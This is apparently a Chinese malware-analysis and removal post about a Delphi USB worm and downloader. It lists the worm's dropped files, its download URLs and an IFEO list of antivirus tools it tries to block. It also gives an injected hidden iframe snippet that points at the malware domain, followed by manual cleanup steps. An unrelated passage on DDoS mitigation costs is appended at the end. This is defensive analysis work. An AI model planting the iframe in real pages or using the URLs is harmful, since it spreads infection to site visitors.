文件大小:30625 bytes
AV命名:Virus.Win32.AutoRun.of (Kaspersky)
加壳方式:FSG
编写语言:Delphi
病毒类型:U盘病毒\下载者
文件MD5:e9612843c037fe7b62ded850bf4689c1
传播方式:U盘等移动介质\网页漏洞。
行为分析:
1、释放病毒副本:
%Systemroot%\system32\crsss.exe 30625 字节(注意区别,不是系统文件!)
并查找可用的磁盘,在其目录生成:NIu.exe和Autorun.inf。
2、释放P处理,开启自动播放?
net start shellHWDetection
3、连接60.175.150.1**(安徽省滁州市 电信IDC机房)下载木马。
下了一大堆。。。:
http://*.1030829.com/down.txt
盗号木马品种有:热血江湖\诛仙\完美世界\大话西游\梦幻西游\机战
还带有ARP病毒。。。
4、尝试修改IE主页,不过测试时并未实现,更新地址连接:
http://*.1030829.com/suoding.txt
看了下,是百度的。
5、释放P处理,尝试写入注册表IFEO键值,不过测试时并未实现。。。
REG.exe
360rpt.exe
360Safe.exe
360tray.exe
adam.exe
AgentSvr.exe
AppSvc32.exe
AST.exe
autoruns.exe
avgrssvc.exe
AvMonitor.exe
avp.exe
CCenter.exe
ccSvcHst.exe
FileDsty.exe
HijackThis.exe
FTCleanerShell.exe
IceSword.exe
iparmo.exe
Iparmor.exe
isPwdSvc.exe
kabaload.exe
KASMain.exe
KASTask.exe
KAV32.exe
KAVDX.exe
KAVPFW.exe
KAVSetup.exe
KAVStart.exe
KISLnchr.exe
KMailMon.exe
KMFilter.exe
KPFW32.exe
KPFW32X.exe
KPFWSvc.exe
KRegEx.exe
KsLoader.exe
KvDetect.exe
KvfwMcl.exe
kvol.exe
kvolself.exe
KVSrvXP.exe
kvupload.exe
kvwsc.exe
KWatch.exe
KWatch9x.exe
KWatchX.exe
loaddll.exe
MagicSet.exe
mcconsol.exe
mmqczj.exe
mmsk.exe
NAVSetup.exe
PFW.exe
PFWLiveUpdate.exe
QHSET.exe
Ras.exe
Rav.exe
RavMon.exe
RavMonD.exe
SysSafe.exe
TrojanDetector.exe
symlcsvc.exe
SREng.exe
SmartUp.exe
shcfg32.exe
scan32.exe
safelive.exe
runiep.exe
Rsaupd.exe
RsAgent.exe
rfwsrv.exe
RfwMain.exe
rfwcfg.exe
RegClean.exe
rfwProxy.exe
RavTask.exe
RavStub.exe
Trojanwall.exe
UIHost.exe
UmxAgent.exe
UmxAttachment.exe
UmxCfg.exe
UmxFwHlp.exe
UmxPol.exe
UpLive.EXE.exe
WoptiClean.exe
zxsweep.exe
regedit.exe
msconfig.exe
mmc.exe
taskmgr.exe
6、尝试关闭窗口的一些“敏感字”,连接http://*.1030829.com/guanjian.txt更新列表
保存至%Systemroot%\system32\test1.txt。
现有列表:
木马
病毒
360
瑞星
卡吧
金山
毒霸
江名(作者自己打错了,汗)
可能导致一些程序或浏览的网页会被关闭。
7、遍历磁盘,查找*htm、INDEX.PHP、DEFAULT.PHP、CONN.ASP等网页文件,插入一段JS代码:
{IfrAmE src=http://www.1030829.com/*.htm width=0 height=0}{/IfrAmE}
8、查找硬盘文件,有遇到*.GHO的则删除。
可能导致无法使用GHOST还原。
9、释放一个P处理,尝试把crsss.exe写入注册表启动项,不过还是没有实现``=。=
10、尝试修改注册表,使“系统显示隐藏文件功能失效”。使该功能选项成:
禽兽尚有一丝怜悯,我不是禽兽,所以我没有怜悯。
测试时候仍然没有实现。。
并试图删除安全模式一些键值,也没有成功。
11、还是修改注册表,禁用系统自动更新和防火墙。
键值:NoAutoUpdate与EnableFirewall。
12、每几毫秒为周期访问系统可用的磁盘,如发现NIu.exe和Autorun.inf不在则重写。
同时也实现了U盘感染。
解决方法:
1、http://free.ys168.com/?gudugengkekao下载:
图片点击可在新窗口打开查看修复IFEO之XP系统专用.rar 72KB
图片点击可在新窗口打开查看sreng2.5.zip 780KB
图片点击可在新窗口打开查看PowerRmv.com 101KB
图片点击可在新窗口打开查看显示隐藏文件.reg 9KB
2、断开网络,关闭不需要的进程。以下步骤要按顺序。
3、重启电脑,按F8进入安全模式,如果进不了的话,就正常模式吧!
4、打开任务管理器,如果打开不的话,运行那个“修改IFEO之XP系统专用”。
5、打开任务管理器,关闭crsss.exe进程。
6、打开PowerRmv,选上抑制杀灭对象再次生成,填入下面路径:(注意不要包含空隔)
C:\autorun.inf
C:\niu.exe
D:\autorun.inf
D:\niu.exe
E:\autorun.inf
E:\niu.exe
F:\autorun.inf
F:\niu.exe
X:\autorun.inf
X:\niu.exe
C:\Windows\system32\crsss.exe
X为移动盘.
好了,主体都消灭了,还有木马群,还是使用PowerRmv,继续填入,一次一个:
嫌麻烦的去下载Xdelbox。把下列路径导入。
C:\Program Files\Internet Explorer\PLUGINS\SysWin64.Jmp
C:\Program Files\Internet Explorer\PLUGINS\SysWin74.Jmp
C:\Program Files\Internet Explorer\PLUGINS\WinSys64.Sys
C:\Program Files\Internet Explorer\PLUGINS\WinSys74.Sys
C:\Program Files\winp\actv.ini
C:\Program Files\winp\code.dll
C:\Program Files\winp\lexi.lex
C:\Program Files\winp\play.dll
C:\Program Files\winp\snet.dll
C:\Program Files\winp\stdi.ini
C:\Program Files\winp\stdl.ini
C:\Program Files\winp\stub.dll
C:\Program Files\winp\upme.ini
C:\Program Files\winp\vote.dll
C:\Windows\upxdnd.exe
C:\Windows\Fonts\ardaase.fon
C:\Windows\Fonts\armease.fon
C:\Windows\Fonts\chqiaur.fon
C:\Windows\Fonts\chreaur.fon
C:\Windows\Fonts\chtiaur.fon
C:\Windows\Fonts\enweafx.fon
C:\Windows\Fonts\gejiand.fon
C:\Windows\Fonts\msguasd.fon
C:\Windows\Fonts\mszhasd.fon
C:\Windows\system32\0svchsot.exe
C:\Windows\system32\13temp.exe
C:\Windows\system32\17temp.exe
C:\Windows\system32\18temp.exe
C:\Windows\system32\19temp.exe
C:\Windows\system32\1svchsot.exe
C:\Windows\system32\21temp.exe
C:\Windows\system32\2svchsot.exe
C:\Windows\system32\4temp.exe
C:\Windows\system32\8kJk1g.dll
C:\Windows\system32\Autorun.inf
C:\Windows\system32\avpcq.dll
C:\Windows\system32\avpdj.dll
C:\Windows\system32\avpms.dll
C:\Windows\system32\avwgain.dll
C:\Windows\system32\avwgcmn.dll
C:\Windows\system32\avwgcst.exe
C:\Windows\system32\avzxain.dll
C:\Windows\system32\avzxbmn.dll
C:\Windows\system32\avzxbst.exe
C:\Windows\system32\c.txtC:\Windows\system32\d.txt
C:\Windows\system32\dpserio1.dll
C:\Windows\system32\h1.dll
C:\Windows\system32\jshelp.exe
C:\Windows\system32\jsshow.dll
C:\Windows\system32\kawdacs.dll
C:\Windows\system32\kawdbaz.exe
C:\Windows\system32\kawdbzy.dll
C:\Windows\system32\kvdxacf.dll
C:\Windows\system32\kvdxcis.exe
C:\Windows\system32\kvdxcma.dll
C:\Windows\system32\kvmxacf.dll
C:\Windows\system32\kvmxdis.exe
C:\Windows\system32\kvmxdma.dll
C:\Windows\system32\msavp.dll
C:\Windows\system32\mscomm.dll
C:\Windows\system32\nz4iek.dll
C:\Windows\system32\playasp.exe
C:\Windows\system32\raqjani.dll
C:\Windows\system32\raqjapi.dll
C:\Windows\system32\raqjatl.exe
C:\Windows\system32\rarjani.dll
C:\Windows\system32\rarjbpi.dll
C:\Windows\system32\rarjbtl.exe
C:\Windows\system32\ratbani.dll
C:\Windows\system32\ratbdpi.dll
C:\Windows\system32\ratbdtl.exe
C:\Windows\system32\rsjzafg.dll
C:\Windows\system32\rsjzbpm.dll
C:\Windows\system32\rsjzbsp.exe
C:\Windows\system32\test1.txt
C:\Windows\system32\upxdnd.dll
C:\Windows\system32\wxpSetup170.exe
C:\Windows\system32\xyupri0.dll
C:\Windows\system32\drivers\486who07g.sys
C:\Windows\system32\drivers\jshelp.sys
C:\Windows\system32\drivers\jsshow.drv
C:\Windows\system32\drivers\jsshow.sys
C:\Windows\system32\drivers\nnf5v.sys
C:\Windows\system32\drivers\scvhost.exe
C:\Windows\system32\drivers\svchost.exe
C:\Windows\system32\wbem\mopsll32.dll
6、重启系统,打开SREng,删除:
注册表
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
{upxdnd}{C:\winnt\upxdnd.exe} []
{KVP}{C:\winnt\system32\drivers\svchost.exe} []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
ShellExecuteHooks]
{{4D47B341-43DF-4563-753F-345FFA3157D4}}{C:\winnt\system32\kvmxdma.dll} []
{{3C87A354-ABC3-DEDE-FF33-3213FD7447C3}}{C:\winnt\system32\kvdxcma.dll} []
{{3A1247C1-53DA-FF43-ABD3-345F323A48D3}}{C:\winnt\system32\avwgcmn.dll} []
{{46650011-3344-6688-4899-345FABCD1564}}{C:\winnt\system32\ratbdpi.dll} []
{{14783410-4F90-34A0-7820-3230ACD05F41}}{C:\winnt\system32\raqjapi.dll} []
{{22FAACDE-34DA-CCD4-AB4D-DA34485A3422}}{C:\winnt\system32\rsjzbpm.dll} []
{{2859245F-345D-BC13-AC4F-145D47DA34F2}}{C:\winnt\system32\avzxbmn.dll} []
{{28907901-1416-3389-9981-372178569982}}{C:\winnt\system32\kawdbzy.dll} []
{{2598FF45-DA60-F48A-BC43-10AC47853D52}}{C:\winnt\system32\rarjbpi.dll} []
{{E3F426F6-8634-42A5-A29E-BC694A88FB7D}}{C:\winnt\system32\xyupri0.dll} []
{{1AB09B3F-A6D0-4B55-B87D-264934EBEAED}}{C:\Program Files\Internet Explorer\PLUGINS\WinSys74.Sys} []
{{5D83AD9C-3BFC-43F5-979D-2904DBC54A8E}}{C:\Program Files\Internet Explorer\PLUGINS\WinSys64.Sys} []
服务:
[Windows svcs RunThem / svcs][Stopped/Auto Start]
{C:\winnt\System32\svchost.exe -k netsvcs--}C:\PROGRA~1\winp\snet.dll}{}
[ServiceJsHelp / ServiceJsHelp][Running/Auto Start]
{C:\winnt\system32\playasp.exe}{}
驱动:
[nnf5v / nnf5v][Running/Auto Start]
{\??\C:\winnt\system32\drivers\nnf5v.sys}{N/A}
[486who07g / 486who07g][Running/Boot Start]
{\SystemRoot\System32\DRIVERS\486who07g.sys}{N/A}
(可能名字不一样。)
7、SREng,编辑注册表,注意不是删除:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
{shell}{Explorer.exe jshelp.exe} []
这个SRENG会自动修复,如果没有修复的话,把后面jshelp.exe去掉,成:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
{shell}{Explorer.exe} []
还有这个:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
{AppInit_DLLs}{rarjbpi.dll} []
置空,成:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
{AppInit_DLLs}{} []
8、把下载的工具导入,修复显示隐藏项。如果安全模式被破坏的,用SRENG修复``
9、还有那些被插代码的网页,去我网盘下载清除:
iframekill.rar 212KB
用法很简单,就不费话了。
10、如果防火墙和自动更新被禁用了的话,打开注册表,删除:
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU下的:
NoAutoUpdate和AUOptions键值。
还有:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\
StandardProfile
的EnableFirewall键。
11、修改QQ、网游等密码。
1、更换机房,物理IP的更换能暂时解决攻击问题。但是攻击都是有破坏性的。一个IDC机房是不会任由你的服务器被攻击而不采取一些措施的。如果是小型攻击几百M的话。IDC的机务或公司技术会物理拔出网线来解决攻击。大流量攻击事件机房都不愿意冒机房瘫痪的风险去接单。2、上防火墙,一般小型防火墙的成本是3-5W。大型防火墙的价格在20W以上。这个要看网络拓扑了。有些架构不适合做墙。会过滤大量用户正常数据。所以一般做防火墙的都是旁挂拓扑。必要时做切换。
3、购买流量清洗。据我所知上海目前电信运营商有自己的黑洞流量清洗服务。价格一般在1000~3000元/月。能防1-5G的流量攻击。针对IP绑定,需要学习周期,学习周期比较长会对正常数据有些许影响。长期来看比较稳定。但只能防流量。无法抵抗CC。
4、最后一种是新的防护。使用云主机虚拟主机做的集群来抵御。大部分小规模攻击都是以个人形式发起的攻击。黑客能控制的肉鸡有限。如果接入的云主机资源池够大。数据出口够大就完全能硬抗小型的攻击。另外云主机可虚拟制作出一个防火墙通过内网连接控制外网屏蔽的双网卡组建双层网络
UP主用的墙能抵御多少的攻击呢?小的墙可能还没到100M机器就要宕了。。。
欢迎分享,转载请注明来源:夏雨云
评论列表(0条)